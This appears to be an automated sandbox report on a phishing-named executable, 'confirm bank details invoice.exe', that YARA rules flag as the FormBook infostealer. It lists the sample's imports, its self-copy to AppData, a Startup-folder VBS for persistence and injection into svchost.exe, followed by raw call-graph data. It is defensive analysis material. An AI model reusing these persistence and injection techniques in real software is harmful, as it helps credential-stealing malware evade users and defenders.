                  RT_MENU | 0xca4a0 | 0x50 | data | English | Great Britain | 0.9
                  RT_STRING | 0xca4f0 | 0x594 | data | English | Great Britain | 0.3333333333333333
                  RT_STRING | 0xcaa84 | 0x68a | data | English | Great Britain | 0.2747909199522103
                  RT_STRING | 0xcb110 | 0x490 | data | English | Great Britain | 0.3715753424657534
                  RT_STRING | 0xcb5a0 | 0x5fc | data | English | Great Britain | 0.3087467362924282
                  RT_STRING | 0xcbb9c | 0x65c | data | English | Great Britain | 0.34336609336609336
                  RT_STRING | 0xcc1f8 | 0x466 | data | English | Great Britain | 0.3605683836589698
                  RT_STRING | 0xcc660 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
                  RT_RCDATA | 0xcc7b8 | 0x56961 | data | | | 1.0003270765838543
                  RT_GROUP_ICON | 0x12311c | 0x76 | data | English | Great Britain | 0.6610169491525424
                  RT_GROUP_ICON | 0x123194 | 0x14 | data | English | Great Britain | 1.25
                  RT_GROUP_ICON | 0x1231a8 | 0x14 | data | English | Great Britain | 1.15
                  RT_GROUP_ICON | 0x1231bc | 0x14 | data | English | Great Britain | 1.25
                  RT_VERSION | 0x1231d0 | 0xdc | data | English | Great Britain | 0.6181818181818182
                  RT_MANIFEST | 0x1232ac | 0x3b0 | ASCII text, with CRLF line terminators | English | Great Britain | 0.5116525423728814
                  DLL | Import
                  WSOCK32.dll | __WSAFDIsSet, recv, send, setsockopt, ntohs, recvfrom, select, WSAStartup, htons, accept, listen, bind, closesocket, connect, WSACleanup, ioctlsocket, sendto, WSAGetLastError, inet_addr, gethostbyname, gethostname, socket
                  VERSION.dll | GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                  WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
                  COMCTL32.dll | ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_Create, InitCommonControlsEx, ImageList_ReplaceIcon
                  MPR.dll | WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                  WININET.dll | InternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetConnectW, InternetQueryDataAvailable
                  PSAPI.DLL | GetProcessMemoryInfo
                  IPHLPAPI.DLL | IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                  USERENV.dll | UnloadUserProfile, DestroyEnvironmentBlock, CreateEnvironmentBlock, LoadUserProfileW
                  UxTheme.dll | IsThemeActive
                  KERNEL32.dll | HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetCurrentThread, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, DeleteCriticalSection, WaitForSingleObject, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, CloseHandle, GetLastError, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, RaiseException, InitializeCriticalSectionAndSpinCount, InterlockedDecrement, InterlockedIncrement, CreateThread, DuplicateHandle, EnterCriticalSection, GetCurrentProcess, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, HeapSize, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, SetFilePointer, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, WriteConsoleW, SetEndOfFile, DeleteFileW, SetEnvironmentVariableA
                  USER32.dll | SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, DrawMenuBar, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, MonitorFromRect, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, CopyImage, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, UnregisterHotKey, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, AdjustWindowRectEx, SetRect, SetClipboardData, 
EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, DeleteMenu, PeekMessageW, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, CharLowerBuffW, GetWindowTextW
                  GDI32.dllSetPixel, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, GetDeviceCaps, CloseFigure, LineTo, AngleArc, CreateCompatibleBitmap, CreateCompatibleDC, MoveToEx, Ellipse, PolyDraw, BeginPath, SelectObject, StretchBlt, GetDIBits, DeleteDC, GetPixel, CreateDCW, GetStockObject, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, EndPath
                  COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                  ADVAPI32.dllGetAclInformation, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, InitiateSystemShutdownExW, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, SetSecurityDescriptorDacl, AddAce, GetAce
                  SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                  ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                  OLEAUT32.dllRegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, UnRegisterTypeLib, SafeArrayCreateVector, SysAllocString, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, VariantCopy, VariantClear, CreateDispTypeInfo, CreateStdDispatch, DispCallFunc, VariantChangeType, SafeArrayAllocDescriptorEx, VariantInit
                  Language of compilation system: English
                  Country where language is spoken: Great Britain
                  No network behavior found


                  Target ID:0
                  Start time:06:19:10
                  Start date:21/11/2024
                  Path:C:\Users\user\Desktop\confirm bank details invoice.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\confirm bank details invoice.exe"
                  Imagebase:0x470000
                  File size:1'214'464 bytes
                  MD5 hash:AAC8FCCDEA2F379BB5C27EDF267427FD
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:low
                  Has exited:true

                  Target ID:2
                  Start time:06:19:12
                  Start date:21/11/2024
                  Path:C:\Users\user\AppData\Local\Vevina\deblaterate.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\confirm bank details invoice.exe"
                  Imagebase:0xd20000
                  File size:1'214'464 bytes
                  MD5 hash:AAC8FCCDEA2F379BB5C27EDF267427FD
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Antivirus matches:
                  • Detection: 100%, Joe Sandbox ML
                  • Detection: 34%, ReversingLabs
                  Reputation:low
                  Has exited:true

                  Target ID:3
                  Start time:06:19:14
                  Start date:21/11/2024
                  Path:C:\Windows\SysWOW64\svchost.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\confirm bank details invoice.exe"
                  Imagebase:0x1000000
                  File size:46'504 bytes
                  MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2352206461.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2352898550.0000000003390000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                  Reputation:high
                  Has exited:true

                  Target ID:4
                  Start time:06:19:24
                  Start date:21/11/2024
                  Path:C:\Windows\System32\wscript.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\deblaterate.vbs"
                  Imagebase:0x7ff632d60000
                  File size:170'496 bytes
                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:5
                  Start time:06:19:25
                  Start date:21/11/2024
                  Path:C:\Users\user\AppData\Local\Vevina\deblaterate.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\AppData\Local\Vevina\deblaterate.exe"
                  Imagebase:0xd20000
                  File size:1'214'464 bytes
                  MD5 hash:AAC8FCCDEA2F379BB5C27EDF267427FD
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:low
                  Has exited:true

                  Target ID:7
                  Start time:06:19:27
                  Start date:21/11/2024
                  Path:C:\Windows\SysWOW64\svchost.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\AppData\Local\Vevina\deblaterate.exe"
                  Imagebase:0x1000000
                  File size:46'504 bytes
                  MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.2462871861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.2463196003.0000000003160000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                  Reputation:high
                  Has exited:true


                    Execution Graph

                    Execution Coverage:3.7%
                    Dynamic/Decrypted Code Coverage:0.4%
                    Signature Coverage:9.1%
                    Total number of Nodes:2000
                    Total number of Limit Nodes:58
API calls __wtof_l 93953->94123 93955 49294d 93955->93894 93957 49e9de _doexit 93956->93957 93958 49e9fe 93957->93958 93959 49e9e6 93957->93959 93960 49ea7b 93958->93960 93966 49ea28 93958->93966 94139 497bda 47 API calls __getptd_noexit 93959->94139 94143 497bda 47 API calls __getptd_noexit 93960->94143 93962 49e9eb 94140 497c0e 47 API calls __getptd_noexit 93962->94140 93965 49ea80 94144 497c0e 47 API calls __getptd_noexit 93965->94144 93968 49a8ed ___lock_fhandle 49 API calls 93966->93968 93970 49ea2e 93968->93970 93969 49ea88 94145 496e10 8 API calls __wtof_l 93969->94145 93972 49ea4c 93970->93972 93973 49ea41 93970->93973 94141 497c0e 47 API calls __getptd_noexit 93972->94141 94124 49ea9c 93973->94124 93974 49e9f3 _doexit 93974->93896 93977 49ea47 94142 49ea73 LeaveCriticalSection __unlock_fhandle 93977->94142 93979->93886 93980->93890 93982 49af6d _doexit 93981->93982 93983 49af8d 93982->93983 93984 49af75 93982->93984 93985 49b022 93983->93985 93991 49afbf 93983->93991 94079 497bda 47 API calls __getptd_noexit 93984->94079 94084 497bda 47 API calls __getptd_noexit 93985->94084 93987 49af7a 94080 497c0e 47 API calls __getptd_noexit 93987->94080 93990 49b027 94085 497c0e 47 API calls __getptd_noexit 93990->94085 94006 49a8ed 93991->94006 93994 49b02f 94086 496e10 8 API calls __wtof_l 93994->94086 93995 49afc5 93997 49afd8 93995->93997 93998 49afeb 93995->93998 94015 49b043 93997->94015 94081 497c0e 47 API calls __getptd_noexit 93998->94081 94000 49af82 _doexit 94000->93940 94002 49afe4 94083 49b01a LeaveCriticalSection __unlock_fhandle 94002->94083 94003 49aff0 94082 497bda 47 API calls __getptd_noexit 94003->94082 94007 49a8f9 _doexit 94006->94007 94008 49a946 EnterCriticalSection 94007->94008 94009 497cf4 __lock 47 API calls 94007->94009 94010 49a96c _doexit 94008->94010 94011 49a91d 94009->94011 94010->93995 94012 49a928 InitializeCriticalSectionAndSpinCount 94011->94012 94013 49a93a 94011->94013 94012->94013 94087 49a970 LeaveCriticalSection _doexit 
94013->94087 94016 49b050 __ftell_nolock 94015->94016 94017 49b08d 94016->94017 94018 49b0ac 94016->94018 94048 49b082 94016->94048 94097 497bda 47 API calls __getptd_noexit 94017->94097 94021 49b105 94018->94021 94022 49b0e9 94018->94022 94026 49b11c 94021->94026 94103 49f82f 49 API calls 3 library calls 94021->94103 94100 497bda 47 API calls __getptd_noexit 94022->94100 94023 49b86b 94023->94002 94024 49b092 94098 497c0e 47 API calls __getptd_noexit 94024->94098 94088 4a3bf2 94026->94088 94029 49b0ee 94101 497c0e 47 API calls __getptd_noexit 94029->94101 94031 49b099 94099 496e10 8 API calls __wtof_l 94031->94099 94032 49b12a 94035 49b44b 94032->94035 94104 497a0d 47 API calls 2 library calls 94032->94104 94037 49b7b8 WriteFile 94035->94037 94038 49b463 94035->94038 94036 49b0f5 94102 496e10 8 API calls __wtof_l 94036->94102 94042 49b7e1 GetLastError 94037->94042 94047 49b410 94037->94047 94041 49b55a 94038->94041 94051 49b479 94038->94051 94052 49b663 94041->94052 94055 49b565 94041->94055 94042->94047 94043 49b150 GetConsoleMode 94043->94035 94045 49b189 94043->94045 94044 49b81b 94044->94048 94109 497c0e 47 API calls __getptd_noexit 94044->94109 94045->94035 94049 49b199 GetConsoleCP 94045->94049 94047->94044 94047->94048 94054 49b7f7 94047->94054 94111 49a70c 94048->94111 94049->94047 94077 49b1c2 94049->94077 94050 49b4e9 WriteFile 94050->94042 94056 49b526 94050->94056 94051->94044 94051->94050 94052->94044 94057 49b6d8 WideCharToMultiByte 94052->94057 94053 49b843 94110 497bda 47 API calls __getptd_noexit 94053->94110 94059 49b7fe 94054->94059 94060 49b812 94054->94060 94055->94044 94061 49b5de WriteFile 94055->94061 94056->94047 94056->94051 94062 49b555 94056->94062 94057->94042 94071 49b71f 94057->94071 94106 497c0e 47 API calls __getptd_noexit 94059->94106 94108 497bed 47 API calls 2 library calls 94060->94108 94061->94042 94065 49b62d 94061->94065 94062->94047 94065->94047 94065->94055 94065->94062 94066 49b727 WriteFile 94068 49b77a GetLastError 
94066->94068 94066->94071 94067 49b803 94107 497bda 47 API calls __getptd_noexit 94067->94107 94068->94071 94071->94047 94071->94052 94071->94062 94071->94066 94072 4a5884 WriteConsoleW CreateFileW __chsize_nolock 94075 49b2f6 94072->94075 94073 4a40f7 59 API calls __chsize_nolock 94073->94077 94074 49b28f WideCharToMultiByte 94074->94047 94076 49b2ca WriteFile 94074->94076 94075->94042 94075->94047 94075->94072 94075->94077 94078 49b321 WriteFile 94075->94078 94076->94042 94076->94075 94077->94047 94077->94073 94077->94074 94077->94075 94105 491688 57 API calls __isleadbyte_l 94077->94105 94078->94042 94078->94075 94079->93987 94080->94000 94081->94003 94082->94002 94083->94000 94084->93990 94085->93994 94086->94000 94087->94008 94089 4a3c0a 94088->94089 94090 4a3bfd 94088->94090 94092 4a3c16 94089->94092 94119 497c0e 47 API calls __getptd_noexit 94089->94119 94118 497c0e 47 API calls __getptd_noexit 94090->94118 94092->94032 94094 4a3c02 94094->94032 94095 4a3c37 94120 496e10 8 API calls __wtof_l 94095->94120 94097->94024 94098->94031 94099->94048 94100->94029 94101->94036 94102->94048 94103->94026 94104->94043 94105->94077 94106->94067 94107->94048 94108->94048 94109->94053 94110->94048 94112 49a714 94111->94112 94113 49a716 IsProcessorFeaturePresent 94111->94113 94112->94023 94115 4a37b0 94113->94115 94121 4a375f 5 API calls ___raise_securityfailure 94115->94121 94117 4a3893 94117->94023 94118->94094 94119->94095 94120->94094 94121->94117 94122->93953 94123->93955 94146 49aba4 94124->94146 94126 49eaaa 94127 49eb00 94126->94127 94128 49eade 94126->94128 94130 49aba4 __close_nolock 47 API calls 94126->94130 94159 49ab1e 48 API calls 2 library calls 94127->94159 94128->94127 94131 49aba4 __close_nolock 47 API calls 94128->94131 94133 49ead5 94130->94133 94134 49eaea CloseHandle 94131->94134 94132 49eb08 94135 49eb2a 94132->94135 94160 497bed 47 API calls 2 library calls 94132->94160 94136 49aba4 __close_nolock 47 API calls 94133->94136 94134->94127 94137 49eaf6 
GetLastError 94134->94137 94135->93977 94136->94128 94137->94127 94139->93962 94140->93974 94141->93977 94142->93974 94143->93965 94144->93969 94145->93974 94147 49abaf 94146->94147 94148 49abc4 94146->94148 94161 497bda 47 API calls __getptd_noexit 94147->94161 94153 49abe9 94148->94153 94163 497bda 47 API calls __getptd_noexit 94148->94163 94150 49abb4 94162 497c0e 47 API calls __getptd_noexit 94150->94162 94153->94126 94154 49abf3 94164 497c0e 47 API calls __getptd_noexit 94154->94164 94156 49abfb 94165 496e10 8 API calls __wtof_l 94156->94165 94157 49abbc 94157->94126 94159->94132 94160->94135 94161->94150 94162->94157 94163->94154 94164->94156 94165->94157 94167 4b6cc4 FindFirstFileW 94166->94167 94169 4b6529 94166->94169 94168 4b6cd9 FindClose 94167->94168 94167->94169 94168->94169 94169->93725 94261 474214 94170->94261 94175 4741d4 LoadLibraryExW 94271 474291 94175->94271 94176 4e4f73 94177 474252 84 API calls 94176->94177 94179 4e4f7a 94177->94179 94181 474291 3 API calls 94179->94181 94183 4e4f82 94181->94183 94297 4744ed 94183->94297 94184 4741fb 94184->94183 94185 474207 94184->94185 94187 474252 84 API calls 94185->94187 94189 47420c 94187->94189 94189->93832 94189->93833 94191 4e4fa9 94305 474950 94191->94305 94559 491e46 94194->94559 94198 4b6918 _wcschr __ftell_nolock 94197->94198 94199 491dfc __wsplitpath 47 API calls 94198->94199 94202 4b692e _wcscat _wcscpy 94198->94202 94200 4b695d 94199->94200 94201 491dfc __wsplitpath 47 API calls 94200->94201 94201->94202 94202->93853 94204 4bbfb1 __ftell_nolock 94203->94204 94205 48f4ea 48 API calls 94204->94205 94206 4bc00e 94205->94206 94207 4747b7 48 API calls 94206->94207 94208 4bc018 94207->94208 94209 4bbdb4 GetSystemTimeAsFileTime 94208->94209 94210 4bc023 94209->94210 94211 474517 83 API calls 94210->94211 94212 4bc036 _wcscmp 94211->94212 94213 4bc05a 94212->94213 94214 4bc107 94212->94214 94602 4bc56d 94213->94602 94216 4bc56d 94 API calls 94214->94216 94231 4bc0d3 _wcscat 94216->94231 94218 491dfc 
__wsplitpath 47 API calls 94223 4bc088 _wcscat _wcscpy 94218->94223 94219 4744ed 64 API calls 94221 4bc12c 94219->94221 94220 4bc110 94220->93858 94222 4744ed 64 API calls 94221->94222 94224 4bc13c 94222->94224 94226 491dfc __wsplitpath 47 API calls 94223->94226 94225 4744ed 64 API calls 94224->94225 94227 4bc157 94225->94227 94226->94231 94228 4744ed 64 API calls 94227->94228 94229 4bc167 94228->94229 94230 4744ed 64 API calls 94229->94230 94232 4bc182 94230->94232 94231->94219 94231->94220 94233 4744ed 64 API calls 94232->94233 94234 4bc192 94233->94234 94235 4744ed 64 API calls 94234->94235 94236 4bc1a2 94235->94236 94237 4744ed 64 API calls 94236->94237 94238 4bc1b2 94237->94238 94585 4bc71a GetTempPathW GetTempFileNameW 94238->94585 94240 4bc1be 94241 493499 117 API calls 94240->94241 94251 4bc1cf 94241->94251 94242 4bc289 94243 4935e4 __fcloseall 83 API calls 94242->94243 94244 4bc294 94243->94244 94246 4bc29a DeleteFileW 94244->94246 94247 4bc2ae 94244->94247 94245 4744ed 64 API calls 94245->94251 94246->94220 94248 4bc342 CopyFileW 94247->94248 94253 4bc2b8 94247->94253 94249 4bc36a DeleteFileW 94248->94249 94250 4bc358 DeleteFileW 94248->94250 94250->94220 94251->94220 94251->94242 94251->94245 94586 492aae 94251->94586 94258->93822 94259->93844 94260->93850 94310 474339 94261->94310 94264 47423c 94266 474244 FreeLibrary 94264->94266 94267 4741bb 94264->94267 94266->94267 94268 493499 94267->94268 94318 4934ae 94268->94318 94270 4741c8 94270->94175 94270->94176 94476 4742e4 94271->94476 94274 4742b8 94275 4742c1 FreeLibrary 94274->94275 94276 4741ec 94274->94276 94275->94276 94278 474380 94276->94278 94279 48f4ea 48 API calls 94278->94279 94280 474395 94279->94280 94484 4747b7 94280->94484 94282 4743a1 _memcpy_s 94283 4743dc 94282->94283 94284 4744d1 94282->94284 94285 474499 94282->94285 94286 474950 57 API calls 94283->94286 94498 4bc750 93 API calls 94284->94498 94487 47406b CreateStreamOnHGlobal 94285->94487 94294 4743e5 94286->94294 94289 4744ed 64 
API calls 94289->94294 94290 474479 94290->94184 94292 4e4ed7 94293 474517 83 API calls 94292->94293 94295 4e4eeb 94293->94295 94294->94289 94294->94290 94294->94292 94493 474517 94294->94493 94296 4744ed 64 API calls 94295->94296 94296->94290 94298 4744ff 94297->94298 94299 4e4fc0 94297->94299 94516 49381e 94298->94516 94302 4bbf5a 94536 4bbdb4 94302->94536 94304 4bbf70 94304->94191 94306 47495f 94305->94306 94307 4e5002 94305->94307 94541 493e65 94306->94541 94309 474967 94314 47434b 94310->94314 94313 474321 LoadLibraryA GetProcAddress 94313->94264 94315 47422f 94314->94315 94316 474354 LoadLibraryA 94314->94316 94315->94264 94315->94313 94316->94315 94317 474365 GetProcAddress 94316->94317 94317->94315 94320 4934ba _doexit 94318->94320 94319 4934cd 94366 497c0e 47 API calls __getptd_noexit 94319->94366 94320->94319 94322 4934fe 94320->94322 94337 49e4c8 94322->94337 94323 4934d2 94367 496e10 8 API calls __wtof_l 94323->94367 94326 493503 94327 493519 94326->94327 94328 49350c 94326->94328 94330 493543 94327->94330 94331 493523 94327->94331 94368 497c0e 47 API calls __getptd_noexit 94328->94368 94351 49e5e0 94330->94351 94369 497c0e 47 API calls __getptd_noexit 94331->94369 94332 4934dd _doexit @_EH4_CallFilterFunc@8 94332->94270 94338 49e4d4 _doexit 94337->94338 94339 497cf4 __lock 47 API calls 94338->94339 94348 49e4e2 94339->94348 94340 49e559 94376 4969d0 47 API calls __crtLCMapStringA_stat 94340->94376 94343 49e560 94345 49e56f InitializeCriticalSectionAndSpinCount EnterCriticalSection 94343->94345 94349 49e552 94343->94349 94344 49e5cc _doexit 94344->94326 94345->94349 94346 497d7c __mtinitlocknum 47 API calls 94346->94348 94348->94340 94348->94346 94348->94349 94374 494e5b 48 API calls __lock 94348->94374 94375 494ec5 LeaveCriticalSection LeaveCriticalSection _doexit 94348->94375 94371 49e5d7 94349->94371 94352 49e600 __wopenfile 94351->94352 94353 49e61a 94352->94353 94365 49e7d5 94352->94365 94383 49185b 59 API calls 2 library calls 94352->94383 94381 
497c0e 47 API calls __getptd_noexit 94353->94381 94355 49e61f 94382 496e10 8 API calls __wtof_l 94355->94382 94357 49354e 94370 493570 LeaveCriticalSection LeaveCriticalSection _fprintf 94357->94370 94358 49e838 94378 4a63c9 94358->94378 94361 49e7ce 94361->94365 94384 49185b 59 API calls 2 library calls 94361->94384 94363 49e7ed 94363->94365 94385 49185b 59 API calls 2 library calls 94363->94385 94365->94353 94365->94358 94366->94323 94367->94332 94368->94332 94369->94332 94370->94332 94377 497e58 LeaveCriticalSection 94371->94377 94373 49e5de 94373->94344 94374->94348 94375->94348 94376->94343 94377->94373 94386 4a5bb1 94378->94386 94380 4a63e2 94380->94357 94381->94355 94382->94357 94383->94361 94384->94363 94385->94365 94388 4a5bbd _doexit 94386->94388 94387 4a5bcf 94473 497c0e 47 API calls __getptd_noexit 94387->94473 94388->94387 94390 4a5c06 94388->94390 94397 4a5c78 94390->94397 94391 4a5bd4 94474 496e10 8 API calls __wtof_l 94391->94474 94394 4a5c23 94475 4a5c4c LeaveCriticalSection __unlock_fhandle 94394->94475 94396 4a5bde _doexit 94396->94380 94398 4a5c98 94397->94398 94399 49273b __wsopen_helper 47 API calls 94398->94399 94402 4a5cb4 94399->94402 94400 496e20 __invoke_watson 8 API calls 94401 4a63c8 94400->94401 94404 4a5bb1 __wsopen_helper 104 API calls 94401->94404 94403 4a5d11 94402->94403 94405 4a5cee 94402->94405 94420 4a5deb 94402->94420 94411 4a5dcf 94403->94411 94418 4a5dad 94403->94418 94406 4a63e2 94404->94406 94407 497bda __dosmaperr 47 API calls 94405->94407 94406->94394 94408 4a5cf3 94407->94408 94409 497c0e __wtof_l 47 API calls 94408->94409 94410 4a5d00 94409->94410 94412 496e10 __wtof_l 8 API calls 94410->94412 94413 497bda __dosmaperr 47 API calls 94411->94413 94414 4a5d0a 94412->94414 94415 4a5dd4 94413->94415 94414->94394 94416 497c0e __wtof_l 47 API calls 94415->94416 94417 4a5de1 94416->94417 94419 496e10 __wtof_l 8 API calls 94417->94419 94421 49a979 __wsopen_helper 52 API calls 94418->94421 